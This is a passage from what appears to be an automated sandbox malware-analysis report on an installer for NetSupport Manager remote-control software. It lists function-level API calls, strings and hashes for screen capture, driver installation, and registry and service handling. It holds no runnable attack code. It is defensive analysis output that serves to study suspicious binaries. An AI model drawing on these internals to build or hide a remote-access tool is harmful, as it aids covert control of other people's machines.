                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: File$DirectorySystem$CopyMoveNameTempwsprintf
                                                                                                                        • String ID: Try again after removing the 'Block Unsigned Driver Policy'$InstallGdihook5 ret %d$Unloadable mirror detected - update on reboot$\gdihook5.dll$copy %s to %s ok$gdihook5 (e2=%d)$gdihook5.dll$mirror already installed$rename %s to %s on reboot ok
                                                                                                                        • API String ID: 3885431741-2696932523
                                                                                                                        • Opcode ID: ace75527934e9b0d957a35d072099a42dfeb61a8789e6b856e7fd1c44ff7eed6
                                                                                                                        • Instruction ID: 59d06ec527d9029ae3c42fbc0ebff15afb9c6af95389afcdcd6ff70f483b3a52
                                                                                                                        • Opcode Fuzzy Hash: ace75527934e9b0d957a35d072099a42dfeb61a8789e6b856e7fd1c44ff7eed6
                                                                                                                        • Instruction Fuzzy Hash: F341E376E0021E9BDB20ABA4DC42BBB7379AF40704F0446F5FA0957282FA746E44CF91
                                                                                                                        Function 00B1C2A0 Relevance: 25.7, APIs: 17, Instructions: 153windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetDC.USER32(?), ref: 00B1C2AD
                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00B1C2BF
                                                                                                                          • Part of subcall function 00B19840: LoadLibraryW.KERNEL32(gdi32.dll), ref: 00B19855
                                                                                                                          • Part of subcall function 00B19840: GetProcAddress.KERNEL32(00000000,SetLayout), ref: 00B19867
                                                                                                                          • Part of subcall function 00B19840: FreeLibrary.KERNEL32(00000000), ref: 00B1987E
                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00B1C2CF
                                                                                                                          • Part of subcall function 00B19710: _memset.LIBCMT ref: 00B19755
                                                                                                                          • Part of subcall function 00B19710: GetVersionExW.KERNEL32(?), ref: 00B1976E
                                                                                                                          • Part of subcall function 00B19710: LoadLibraryW.KERNEL32(kernel32.dll), ref: 00B19795
                                                                                                                          • Part of subcall function 00B19710: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 00B197A7
                                                                                                                          • Part of subcall function 00B19710: FreeLibrary.KERNEL32(00000000), ref: 00B197BF
                                                                                                                          • Part of subcall function 00B19710: GetSystemDefaultLangID.KERNEL32 ref: 00B197CA
                                                                                                                        • LoadBitmapW.USER32(00000000,?), ref: 00B1C2F9
                                                                                                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 00B1C309
                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00B1C323
                                                                                                                        • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00B1C33B
                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00B1C346
                                                                                                                        • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,00000000,00CC0020), ref: 00B1C384
                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00B1C395
                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00B1C39C
                                                                                                                        • DeleteDC.GDI32(00000000), ref: 00B1C3A5
                                                                                                                        • DeleteDC.GDI32(00000000), ref: 00B1C3A8
                                                                                                                        • ReleaseDC.USER32(?,?), ref: 00B1C3B2
                                                                                                                        • DeleteObject.GDI32(00FF00FF), ref: 00B1C3E4
                                                                                                                        • DeleteObject.GDI32(?), ref: 00B1C3EA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Object$DeleteLibrarySelect$CompatibleCreateLoad$AddressBitmapFreeProc$DefaultLangReleaseSystemVersion_memset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4096839739-0
                                                                                                                        • Opcode ID: 5562a8479e59f31ce1124346a0a3864f34def949baf8df8d727b70c4d843984f
                                                                                                                        • Instruction ID: c4e075691cbff83abf37c8fd840de383956343218cf46abfe4ffbaa8b074778c
                                                                                                                        • Opcode Fuzzy Hash: 5562a8479e59f31ce1124346a0a3864f34def949baf8df8d727b70c4d843984f
                                                                                                                        • Instruction Fuzzy Hash: 384141B5A00209BFDB00DFA4DC89EEF77BCEF99711F104155F904E7291DAB4AA018BA5
                                                                                                                        Function 00B24CE0 Relevance: 24.7, APIs: 7, Strings: 7, Instructions: 232registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: EnumValue
                                                                                                                        • String ID: "$%s doesnt exist$%s exists$%s=%s, err=%d$Del %s, err=%d$Found %s$\%s
                                                                                                                        • API String ID: 2814608202-2885399614
                                                                                                                        • Opcode ID: 1f2a807d211fdd8364a6d70c5faa8ccc6a650e64e8e9ea53a88daf67ad0a6f21
                                                                                                                        • Instruction ID: 361956d37f7142992672b27150b0062cc8f9929f60468f5033cd47188250bd04
                                                                                                                        • Opcode Fuzzy Hash: 1f2a807d211fdd8364a6d70c5faa8ccc6a650e64e8e9ea53a88daf67ad0a6f21
                                                                                                                        • Instruction Fuzzy Hash: 4F816D769002299ADB20DB54DC85EEFB3B8EF94300F5485D9F50DA7151EFB09E888FA1
                                                                                                                        Function 00AF8650 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 179serviceCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001,5E06C67B), ref: 00AF868E
                                                                                                                        • OpenServiceW.ADVAPI32(00000000,?,00000001), ref: 00AF86B1
                                                                                                                        • QueryServiceConfigW.ADVAPI32(00000000,00000000,00000000,?), ref: 00AF86D4
                                                                                                                        • GetLastError.KERNEL32 ref: 00AF86D8
                                                                                                                        • _malloc.LIBCMT ref: 00AF86F3
                                                                                                                        • QueryServiceConfigW.ADVAPI32(?,00000000,?,?), ref: 00AF8707
                                                                                                                        • _wcschr.LIBCMT ref: 00AF8717
                                                                                                                        • GetLastError.KERNEL32 ref: 00AF87EB
                                                                                                                          • Part of subcall function 00AF4110: std::_Lockit::_Lockit.LIBCPMT ref: 00AF41C4
                                                                                                                        • _free.LIBCMT ref: 00AF8815
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 00AF8821
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 00AF882E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Service$CloseConfigErrorHandleLastOpenQuery$LockitLockit::_Manager_free_malloc_wcschrstd::_
                                                                                                                        • String ID: /$QueryServiceConfig() failed! $ServicesActive
                                                                                                                        • API String ID: 2351751372-543094129
                                                                                                                        • Opcode ID: dc5c1df2be8f65deaccec9dc75c9d033d3c4bd07521bdb51e5ebd2d011c0c1f4
                                                                                                                        • Instruction ID: 264781dcd873f7dee88205dbe3006562a7352138719d36bb279014c00f77e520
                                                                                                                        • Opcode Fuzzy Hash: dc5c1df2be8f65deaccec9dc75c9d033d3c4bd07521bdb51e5ebd2d011c0c1f4
                                                                                                                        • Instruction Fuzzy Hash: 86513F71D00218ABDB10EBE8DD85FBEB7B8AF44740F144159FA02E7291DF78A904CBA1
                                                                                                                        Function 00B1C0B0 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 142COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetStockObject.GDI32(0000000D), ref: 00B1C104
                                                                                                                        • GetObjectW.GDI32(00000000,0000005C,?), ref: 00B1C116
                                                                                                                        • _memset.LIBCMT ref: 00B1C127
                                                                                                                        • __wcsicoll.LIBCMT ref: 00B1C175
                                                                                                                        • CreateFontIndirectW.GDI32(?), ref: 00B1C208
                                                                                                                        • GetStockObject.GDI32(0000000D), ref: 00B1C23C
                                                                                                                        • CreateFontIndirectW.GDI32(?), ref: 00B1C254
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Object$CreateFontIndirectStock$__wcsicoll_memset
                                                                                                                        • String ID: ..\CTL32\util.cpp$IsA()$MS Shell Dlg$Software\Microsoft\Windows NT\CurrentVersion\FontSubstitutes$e:\nsmsrc\nsm\1410\1410\ctl32\NSMString.h$hFont$hSubstitutedFont
                                                                                                                        • API String ID: 318754603-2717502809
                                                                                                                        • Opcode ID: 40a5f6c472cd49a0778336057adbac393a66328e5cd1042ac291b666e3627526
                                                                                                                        • Instruction ID: 33fc5c1a308f6b93e42d31a6bb77bfa3adf20c8d317fff2e1f6ebd9b0eb2d2c8
                                                                                                                        • Opcode Fuzzy Hash: 40a5f6c472cd49a0778336057adbac393a66328e5cd1042ac291b666e3627526
                                                                                                                        • Instruction Fuzzy Hash: E8518470984309ABDB20DFA4DC56FEE7BF8EF19704F904199E815AB2E2EB745504CB60
                                                                                                                        Function 00AFE5E0 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 124libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadLibraryW.KERNEL32(USER32), ref: 00AFE5F9
                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesW), ref: 00AFE61B
                                                                                                                        • _memset.LIBCMT ref: 00AFE635
                                                                                                                        • EnumDisplaySettingsW.USER32(00000000,000000FF,?), ref: 00AFE654
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00AFE65F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$AddressDisplayEnumFreeLoadProcSettings_memset
                                                                                                                        • String ID: EnumDisplayDevicesW$USER32$gdihook5$pci gdihook5
                                                                                                                        • API String ID: 3617835454-4052134795
                                                                                                                        • Opcode ID: f6a304cb34834d722bacc804545c706d7e887489c7ebfce796769877ad31fcd6
                                                                                                                        • Instruction ID: 05f64586273984de2e3098a43e1ddcd17210fe7a5bf808ea026ccefeeb9a746a
                                                                                                                        • Opcode Fuzzy Hash: f6a304cb34834d722bacc804545c706d7e887489c7ebfce796769877ad31fcd6
                                                                                                                        • Instruction Fuzzy Hash: 4031F971B0030C67DB10EBA59D8AFAE73ACEF44710F5005A9FA09E71D1EEB59904CAA5
                                                                                                                        Function 00B09380 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 114libraryloadertimeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadLibraryW.KERNEL32(PCIImage.dll), ref: 00B09390
                                                                                                                        • GetProcAddress.KERNEL32(00000000,CompressBitmapToJPEGEx), ref: 00B093AB
                                                                                                                        • GetProcAddress.KERNEL32(00000000,CompressBitmapToPNG), ref: 00B093B5
                                                                                                                        • timeGetTime.WINMM ref: 00B093D5
                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00B093F6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressLibraryProc$FreeLoadTimetime
                                                                                                                        • String ID: CompressBitmapToJPEGEx$CompressBitmapToPNG$PCIImage.dll
                                                                                                                        • API String ID: 263321323-1571491074
                                                                                                                        • Opcode ID: dce77d2a19178cebeebfa9c51b30eea3be14754769cbd90bfeeec5803916de03
                                                                                                                        • Instruction ID: ae0ead03a919bb3deb0deea3cb8300769d30852cb8d1c5a8acf61552b202740d
                                                                                                                        • Opcode Fuzzy Hash: dce77d2a19178cebeebfa9c51b30eea3be14754769cbd90bfeeec5803916de03
                                                                                                                        • Instruction Fuzzy Hash: 1131527A600219ABCB10DFA9FD8899E77A8EB88621B104199FD0D93381DA75DD118BE1
                                                                                                                        Function 00AFE3D0 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 88libraryloaderthreadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B2F030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 00B2F04D
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F09D
                                                                                                                          • Part of subcall function 00B2F030: wvsprintfW.USER32(?,?,00000000), ref: 00B2F0BE
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F0D3
                                                                                                                          • Part of subcall function 00B2F030: _malloc.LIBCMT ref: 00B2F0FC
                                                                                                                        • LoadLibraryW.KERNEL32(newdev.dll), ref: 00AFE3EA
                                                                                                                        • GetProcAddress.KERNEL32(00000000,UpdateDriverForPlugAndPlayDevicesW), ref: 00AFE403
                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,00AFE360,00000000,00000000,?), ref: 00AFE426
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00AFE431
                                                                                                                        Strings
                                                                                                                        • UpdateGdihook5 end, xrefs: 00AFE498
                                                                                                                        • UpdateDriverForPlugAndPlayDevicesW, xrefs: 00AFE3FD
                                                                                                                        • Returned from UpdateDriverForPlugAndPlayDevices, xrefs: 00AFE484
                                                                                                                        • UpdateGdihook5, xrefs: 00AFE3D6
                                                                                                                        • UpdateDriverForPlugAndPlayDevices returned error %d, xrefs: 00AFE477
                                                                                                                        • newdev.dll, xrefs: 00AFE3E5
                                                                                                                        • About to call UpdateDriverForPlugAndPlayDevices, xrefs: 00AFE447
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Librarywsprintf$AddressCreateFreeLoadLocalProcThreadTime_mallocwvsprintf
                                                                                                                        • String ID: About to call UpdateDriverForPlugAndPlayDevices$Returned from UpdateDriverForPlugAndPlayDevices$UpdateDriverForPlugAndPlayDevices returned error %d$UpdateDriverForPlugAndPlayDevicesW$UpdateGdihook5$UpdateGdihook5 end$newdev.dll
                                                                                                                        • API String ID: 4074152753-437864977
                                                                                                                        • Opcode ID: 352ad64827a1f346fb69f08361498ab4acbcbed09bdfc4b3b66eb009f8890f8a
                                                                                                                        • Instruction ID: 256849af16dd03115d7caa485a4d45319656387e7989cee58e0cf875834e46e4
                                                                                                                        • Opcode Fuzzy Hash: 352ad64827a1f346fb69f08361498ab4acbcbed09bdfc4b3b66eb009f8890f8a
                                                                                                                        • Instruction Fuzzy Hash: BE210A75B402096BD7109FA5BC4AFBB37ACEB44B59F000175FD08832E1EEB9980046AA
                                                                                                                        Function 00B24280 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 63windowsleepCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • FindWindowW.USER32(NSMMain,00000000), ref: 00B2428F
                                                                                                                        • PostMessageW.USER32(00000000,00000010,00000000,00000000), ref: 00B242AB
                                                                                                                        • IsWindow.USER32(00000000), ref: 00B242B2
                                                                                                                        • Sleep.KERNEL32(00000064), ref: 00B242BA
                                                                                                                        • IsWindow.USER32(00000000), ref: 00B242BD
                                                                                                                        • FindWindowW.USER32(NSMMain,00000000), ref: 00B242CA
                                                                                                                        • FindWindowW.USER32(CICWClass,00000000), ref: 00B242F3
                                                                                                                        • PostMessageW.USER32(00000000,00000010,00000000,00000000), ref: 00B24300
                                                                                                                        • FindWindowW.USER32(NSMWControl32,00000000), ref: 00B2430D
                                                                                                                        • PostMessageW.USER32(00000000,00000010,00000000,00000000), ref: 00B2431C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Find$MessagePost$Sleep
                                                                                                                        • String ID: CICWClass$NSMMain$NSMWClass$NSMWControl32
                                                                                                                        • API String ID: 376684987-1708001160
                                                                                                                        • Opcode ID: 028ab6faa426dabcfdd3362c0b1116f6b45a2bb969c262fad7b582e276ccc012
                                                                                                                        • Instruction ID: 81371033e6ab815350d0fed118038a05721c341a7a2de32bda2446f8ea0d8dcb
                                                                                                                        • Opcode Fuzzy Hash: 028ab6faa426dabcfdd3362c0b1116f6b45a2bb969c262fad7b582e276ccc012
                                                                                                                        • Instruction Fuzzy Hash: BA114072790325B6FB316765AD06F9A228CDB58F50F150590FB04FB1D1DBF8E801C668
                                                                                                                        Function 00B287F0 Relevance: 23.1, APIs: 5, Strings: 8, Instructions: 365registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • wsprintfW.USER32 ref: 00B28832
                                                                                                                          • Part of subcall function 00B00E40: _malloc.LIBCMT ref: 00B00E5C
                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,0002001F,?), ref: 00B288C9
                                                                                                                          • Part of subcall function 00B2F5E0: LoadStringW.USER32(00AE0000,000003F9,?,00000100), ref: 00B2F60A
                                                                                                                          • Part of subcall function 00B2F5E0: wvsprintfW.USER32(?,?,00000000), ref: 00B2F622
                                                                                                                          • Part of subcall function 00B01DC0: _free.LIBCMT ref: 00B01DED
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LoadOpenString_free_mallocwsprintfwvsprintf
                                                                                                                        • String ID: /S$"%s%s" /* %s%s$%s=%s, e=%d$C:\Windows\Installer\$ImagePath$IsA()$SYSTEM\CurrentControlSet\Services\%s$e:\nsmsrc\nsm\1410\1410\nt\../ctl32/nsmstring.h
                                                                                                                        • API String ID: 2930487696-3284006978
                                                                                                                        • Opcode ID: 7c19cabe0a3d39ead5fe89012dee018cfd17ef7f6102d3a05bd7c3795b1300ae
                                                                                                                        • Instruction ID: f9eaccb799f06d30158ae4ca79638d782005084685e65c23712de0d4302dfc89
                                                                                                                        • Opcode Fuzzy Hash: 7c19cabe0a3d39ead5fe89012dee018cfd17ef7f6102d3a05bd7c3795b1300ae
                                                                                                                        • Instruction Fuzzy Hash: F3E1C134951219AADB24EB64DC9ABDD77F4EF24304F0046D8E409632E2DF756F84CE61
                                                                                                                        Function 00AEA700 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 249libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$Library$Free$Load_memset
                                                                                                                        • String ID: setupapi.dll
                                                                                                                        • API String ID: 1563991502-3506073724
                                                                                                                        • Opcode ID: 98634bd59c67c28e379359740b63220509823597d3533f8b9d38faa9185e2029
                                                                                                                        • Instruction ID: e01dcaf9db9d94cb6fdddbfa28de1f6424e36004d66096edf8a19f925bff1f99
                                                                                                                        • Opcode Fuzzy Hash: 98634bd59c67c28e379359740b63220509823597d3533f8b9d38faa9185e2029
                                                                                                                        • Instruction Fuzzy Hash: D6A11B70A002599FDB24DF69CD88FAEB7B9FB98700F14419AE509E7250DB74AE80CF51
                                                                                                                        Function 00AE4A10 Relevance: 23.0, APIs: 7, Strings: 6, Instructions: 218registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • wsprintfW.USER32 ref: 00AE4A70
                                                                                                                        • wsprintfW.USER32 ref: 00AE4A83
                                                                                                                          • Part of subcall function 00B04990: RegOpenKeyExW.ADVAPI32(?,?,00000000,?), ref: 00B049AC
                                                                                                                          • Part of subcall function 00B049E0: RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,?), ref: 00B04A0B
                                                                                                                        • _malloc.LIBCMT ref: 00AE4B0C
                                                                                                                          • Part of subcall function 00B37CA4: __FF_MSGBANNER.LIBCMT ref: 00B37CBD
                                                                                                                          • Part of subcall function 00B37CA4: __NMSG_WRITE.LIBCMT ref: 00B37CC4
                                                                                                                          • Part of subcall function 00B37CA4: RtlAllocateHeap.NTDLL(00000000,00000001,00000000,?,75BF73E0,?,00B097EE,00000000,?,?), ref: 00B37CE9
                                                                                                                          • Part of subcall function 00B045B0: RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00AE47BC,00000000,00000000), ref: 00B045F5
                                                                                                                        • _free.LIBCMT ref: 00AE4BD4
                                                                                                                        • RegDeleteKeyW.ADVAPI32(80000001,?), ref: 00AE4C2C
                                                                                                                        • __wcsicoll.LIBCMT ref: 00AE4C8F
